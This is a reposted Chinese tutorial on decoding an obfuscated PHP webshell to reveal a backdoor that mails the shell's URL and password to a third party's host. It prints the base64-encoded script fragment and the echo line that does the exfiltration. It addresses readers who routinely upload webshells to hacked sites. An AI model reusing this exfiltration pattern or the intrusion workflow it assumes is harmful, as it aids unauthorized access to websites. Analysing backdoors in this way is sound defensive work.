僅將此文獻給還在為別人的webshell做出貢獻的同學。

拿下一個網站后，理所當然的傳webshll，提權。

但是一些人會在webshell中插入小小的一段代碼，這樣你辛苦拿下的webshell的地址和密碼等等就會統統發送給在webshell插后門的人。

這段代碼可大可小，下面是我隨便找的一個phpwebshell，來解密一下其中的后門。

首先是用記事本打開這個webshell，可以看到，這個shell的大部分代碼都是經過base64編碼的。運行時在解碼運行，這樣別人就不能直接看到明文的代碼。

接下來就是解密的過程了，首先，我們將eval改成print_r

這里說一下，解密之前要先把PHP的環境搭建好。 然后保存運行。

運行后可以看到，基本的代碼都直接顯示了出來，這樣就得到了這個webshell中的大部分代碼，但是圖中還有一部分是base64編碼的代碼，不過只是一小段，所以我們可以自己寫個小的php來顯示出來

print_r(base64_decode(‘經過base64編碼的代碼’));

?>

首先我找到的第一段編碼是base64_decode(‘PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JT

cyJTc0Lz9jZXJ0PTEzJnU9′)

這段代碼賦值給了$copyurl變量。

把這段編碼放進上面的那一小段解密用的php內，然后運行。

可以看到，運行結果是空白的，但是查看源文件后可以看到那么一段script。其中http://后面的帶百分號的可以去URL解碼一下

這就是解碼后的網址了。

在之前那段base64編碼的下面，我又發現了被賦值給變量$copyurll的編碼base64_decode(‘Jz48L3NjcmlwdD4=’)

將這段編碼通過上面的方法解碼后顯示的結果是：’>

這段代碼正好和上面解密的一段結合成了完整的一段script

之后我們可以看看這段可疑的代碼是做什么用的，因為是分別賦值給了$copyurl和$copyurll，所以我們直接搜索這兩個變量就行了

以下是搜索的結果

可以看到：echo “”.$copyurl.$serveru.”&p=”.$serverp.$copyurll.””;

這段代碼里，$serveru和$serverp分別是webshell地址和webshell的密碼。

那echo完整的語句就成了：echo

再結合這段echo前面的代碼可以看出，在驗證webshell密碼正確后，再把密碼通過script提交到解密后的網址中。

通過以上解密，就可以看出這個webshell是已經被人插入了后門，當然也有可能不止這一個后門。

所以以后大家在用webshell首先要注意一下是否已經被人插入了后門，否則你可能辛苦拿下的網站別人輕而易舉的直接登陸你的webshell就控制了這個網站。

本文來自網絡作者匿名由網絡安全攻防研究室(www.91ri.org)信息安全小組收集，轉載請注明出處。

總結

以上是生活随笔為你收集整理的在线扫描php后门_解密php webshell后门的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。